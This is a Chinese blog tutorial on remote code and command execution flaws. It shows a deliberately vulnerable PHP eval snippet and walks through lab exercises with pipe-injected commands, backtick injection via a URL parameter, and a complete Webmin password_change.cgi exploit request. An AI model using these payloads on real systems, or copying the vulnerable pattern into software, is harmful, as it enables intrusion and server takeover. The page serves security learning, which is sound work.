WEB漏洞—RCE 代码及命令执行漏洞

已于 2022-03-11 11:27:40 修改
阅读量3k 收藏 1
点赞数
文章标签: 前端 安全 web安全
于 2022-01-21 23:25:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Holen_/article/details/122628433
版权

什么是RCE?

指的是远程命令/代码执行(remote command/code execute)

在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。
在这里插入图片描述

容易产生此漏洞的地方

查看上面思维导图 “产生

相关函数

首先了解一个函数:eval()函数
eval() 函数把字符串按照 PHP 代码来计算。
该字符串必须是合法的 PHP 代码,且必须以分号结尾。
即:eval(phpcode)

<?php
$code=$_GET['x'];
eval($code);

//http://127.0.0.1:8080/test.php?x=phpinfo();
//$code=phpinfo();
//eval(phpinfo(););
?>

java、python等语言都是同理。

再来了解一个函数:system()函数
执行外部程序并显示输出资料。
system语法: string system(string command, int [return_var]);
system返回值: 字符串
System()函数的主要功能是在系统权限允许的情况是执行系统命令,windows系统和Linux系统都可以执行,Windows系统下可执行可执行文件(.exe、.bat等),也可执行cmd命令,Linux下用途更广,因为Linux系统就是基于命令行的,如基本的ls、cp、rm等。

    <?php
    system(‘ipconfig’,$callback);
    echo $callback;
    ?>

漏洞形成条件

1、有可控变量
2、有漏洞函数

漏洞复现

一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,如图

这是“墨者”里的一个命令执行漏洞靶场
通过输入IP可以ping出连接情况。于是这里就能够做RCE漏洞测试了。
在这里插入图片描述
测试中发现,该输入框只允许输入IP值。
在这里插入图片描述

知识点:“|”(管道符)这个符号,可以通过此符号同时执行多条命令。
在这里插入图片描述

由于这里前端加上了IP输入验证,所以我们可以通过修改数据包内容,在ip值后面加上“|”符号执行后面的“pwd”命令。
在这里插入图片描述
key这个文件中就是这个靶场通关密钥。

复现第二个靶场——PHP代码分析溯源
在这里插入图片描述
关卡内容如图
在这里插入图片描述
通过在线PHP代码运行可得出,eval函数中的代码执行的意思为
在这里插入图片描述

上面代码的意思应该为
在这里插入图片描述
由此可以得出在URL中加入:?a=ls 从而得出文件列表
以及?a=tac key=(文件名).PHP 得出PHP文件内容

知识点:虽然函数用到eval(),但是在Linux中反引号" ` "包起来的内容会被系统命令执行。所以上面a参数后跟的是系统命令。
反引号的作用就是将反引号内的Linux命令先执行,然后将执行结果赋予变量。尽管可以通过输入字符或者字符串来创建变量值,也可以获取来自于其他Linux命令的值。为把Linux命令的结果赋予变量,实现需要执行这个命令。如果在命令行上把Linux命令放在反引号中,这个命令会首先被执行,其结果会成为命令行的一个参数。在赋值时,通过把命令放在反引号中,以便于首先执行,命令的执行结果会被赋予一个变量。反引号可以被视为由要执行命令组成的表达式,其结果会被赋予变量。组成命令的字符本身不会被赋予。在下面的范例中,命令ls*.c被执行,其结果然后被赋予变量listc。ls*.c会生成具有.c扩展名的所有文件列表。这个文件列表随后被赋予变量listc。

    $ listc=`ls *.c` 
    $ echo $listc 
    main.c prog.c lib.c

第三个靶场尝试黑盒测试
在这里插入图片描述
页面如图
在这里插入图片描述
通过百度得知:
Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。

不管它是牛是马,网上寻找相关漏洞
https://www.cnblogs.com/whoami101/p/11465877.html

通过抓包修改其数据包如下

POST /password_change.cgi HTTP/1.1
Host: 127.0.0.1:10000
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: http://127.0.0.1:10000/password_change.cgi/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
cache-control: no-cache

user=rootxx&pam=&expired=2&old=id&new1=test2&new2=test2

得到结果
在这里插入图片描述
将数据包中“old=id”改为“old=ls”,得到当前目录中文件
在这里插入图片描述
复现RCE成功

恩大
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
RCE漏洞
weixin_46962006的博客
12-13 7512
                       RCE(远程代码/命令执行漏洞 目录前言简介 前言        个人观点,若有误请指教 简介 RCE(Remote Code/Command Execute)为远程代码/命令执行漏洞 漏洞产生的原因:在Web应用中开发者为了灵活性,简洁性等会让应用去调用代码或者系统命令执行函数去处理。同时没有考虑用户是否可以控制这些函数的参数问题(若不能控制这些参数,自然也没有这个漏洞;若能控制这些参数,也可能出现考虑了但没有完全防住或者压根没考虑 ????),以至
spring IOC实现(墨者革离)
12-12
代码主要用于spring IOC的实现(墨者革离),模拟一个城门叩问的编剧场景
墨者安全专家 3.7(更新)
11-03
1、墨者革离术 运用了墨者研发的新技术,结合权限管理的功能,有效防止防火墙和杀毒软件尚未识别的安全危险入侵,并在病毒库反应前把系统与安全隐患完全隔离,有效防止木马盗号等。 2、墨者查杀病毒 兼容主流杀毒软件,并可永久免费使用全球杀毒知名企业趋势科技的杀毒专家,将病毒一网打尽。 3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人隐私,防范由此带来的安全威胁。 5、墨者防火墙 快速评估系统的网络防护状态,通过配置病毒防火墙,控制非法网络访问,帮助用户有效抵御黑客攻击等安全风险。 6、墨者安防问答 在线提出您的系统安全问题,不仅有专家及时解答,更有24小时网友互助,让墨者的互动式咨询服务一步到位。 如您的电脑未安装杀毒软件,为彻底清除其中已存的病毒,推荐下载墨者安全专家豪华版,内含终身免费升级的趋势杀毒软件。 墨者安全专家 3.28 版更新信息1、兼容迅雷看看桌面版、迅雷6、五笔加加 2、完善革离术兼容性 3、完善自动更新的功能
RCE(远程命令执行漏洞详解
最新发布
sev1n的博客
04-02 1575
RCE(remote command/code execute,远程命令执行)漏洞 远程代码执行 (RCE) 攻击是指攻击者可以在一个组织的计算机或网络上运行恶意代码执行攻击者控制的代码的能力可用于各种目的,包括部署额外的恶意软件或窃取敏感数据。
墨者杀毒软件
01-29
墨者善守并提倡兼爱,非攻的思想.<br>该软件自有安全监测和防护技术.<br>对会员提供免费的杀毒及桌面安全防护技术和服务.<br>无须任何注册码,全球首款运用权限管理的个人杀毒软件.
墨者安全专家
07-04
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用权限管理等功能,能有效阻止防火墙和杀毒软件尚未识别的安全危险,从源头上杜绝病毒的侵入,从而提高了系统的安全门槛,真正为每一位用户提供全方位的系统安全防护。<br><br>
近墨者未必黑.pdf
12-26
近墨者未必黑.pdf
NGINX-RCE:nginx的rce漏洞利用
04-04
NGINX-RCE nginx的rce漏洞利用 怎么运行呢? 首先只需使用gcc gcc expl0itz.c -o expl0itz 然后chmod chmod +x expl0itz 像二进制文件一样运行之后! ./expl0itz
pikachu~~~RCE
weixin_50339832的博客
06-06 340
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而...
rce-website:RCE网站
05-09
RCE网站 RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。 本地安装 安装Python3( 完美运行) 安装Pelican和支持库 pip install invoke==1.4.1 pip install pelican==3.7.1 pip install markdown==3.1.1 如果要在更改后部署网站,请另外安装 pip install ghp-import==0.5.5 部署需要对存储库写权限。 克隆此存储库 配置 在fabfile.py为本地测试设置适当的端口以在您的计算机上fabfile.py # Port for `serve` PORT = 8001 建造 生成网站 invoke build 启动本地服务器进行测试(可通过)。 invoke serve 这不会在更改后重建网站,这意味着您必须手动停止本地服务器,使用invoke bu
第30天:WEB漏洞-RCE代码命令执行漏洞全解1
08-03
WEB 漏洞-RCE 代码命令执行漏洞全解在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码命令执行函数去处理。比如当应用在调用一些能将
xalanjava源码-jackspoilt:导致RCE的上下文反序列化漏洞-远程代码执行
06-05
漏洞利用:为DeSerializaiton漏洞制作小工具/利用的源代码 攻击脚本:其他 shell 脚本,用于在应用程序服务上引发正常和恶意请求 我怎样才能使用它? 启动 shell 提示(启动易受攻击的 Web 实例) git 克隆 cd 困境 ...
Struts2-RCE:Burp Extender用于检查struts 2 RCE漏洞
04-15
描述此burp扩展有助于识别struts2 Web应用程序中的Struts2远程代码执行漏洞。 此Burp扩展程序检测以下18个RCE,它们是S2-001 S2-007 S2-008 S2-012 S2-013 S2-014 S2-015 S2-016 S2-019 S2-029 S2-032 S2-033 S2-037...
xml执行java源码-Axis-1.4-RCE-Poc:Axis<=1.4远程命令执行RCE)POC
06-06
远程命令执行RCE) POC 环境准备 首先下载Axis1.4 本仓库有一个打包好的axis直接解压到tomcat webapps下即可 ,web-inf/web.xml 去掉AdminServlet注释 然后,server-config.wsdd文件开启enableRemoteAdmin (本地...
java-sec-code:基于springboot和spring security的Java Web常见漏洞安全代码
02-03
Java秒代码Java sec代码是用于学习Java漏洞代码的非常强大且友好的项目。介绍该项目也可以称为Java漏洞代码。 除非没有漏洞,否则默认情况下,每个漏洞类型代码都有一个安全漏洞。 相关的修订代码在注释或代码中。 ...
墨者靶场SQL手工注入漏洞测试(MySQL数据库)通关思路
zyh1588的博客
11-01 960
小白回顾墨者靶场sql手工注入
记在墨者学院业务逻辑漏洞靶场实战感受
weixin_50146421的博客
06-10 666
思路:观察第一个页面需要重置171手机号密码,第二个页面中有四个输入表单,未知的是验证码,所以从验证码下手,在一个看说明,即188手机号已经注册,也就是188可以收到验证码,那么可不可以直接用188手机号获取到验证码,然后用来给171重置密码呢?思路:可以观察余额为1,书的价格超出预算,可以拿bp抓包,然后修改书的价格,达成0元购买,观察bi11和bi22参数分别为10 20 ,对应书的价格,将其改为0,然后放行数据包 即可找到key。防止在登录页面,注册页面,密码修改页面等出现逻辑错误。
面试官问你SQL注入、XSS、文件上传、RCE远程命令执行漏洞如何进行回答
07-12
为了防止RCE漏洞,我们需要保持应用程序和服务器的补丁更新,进行输入验证和过滤,以及使用安全编码和访问控制机制来限制恶意代码执行。 请记住,以上是对每种漏洞的简要解释,你可以根据自己的了解和经验进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值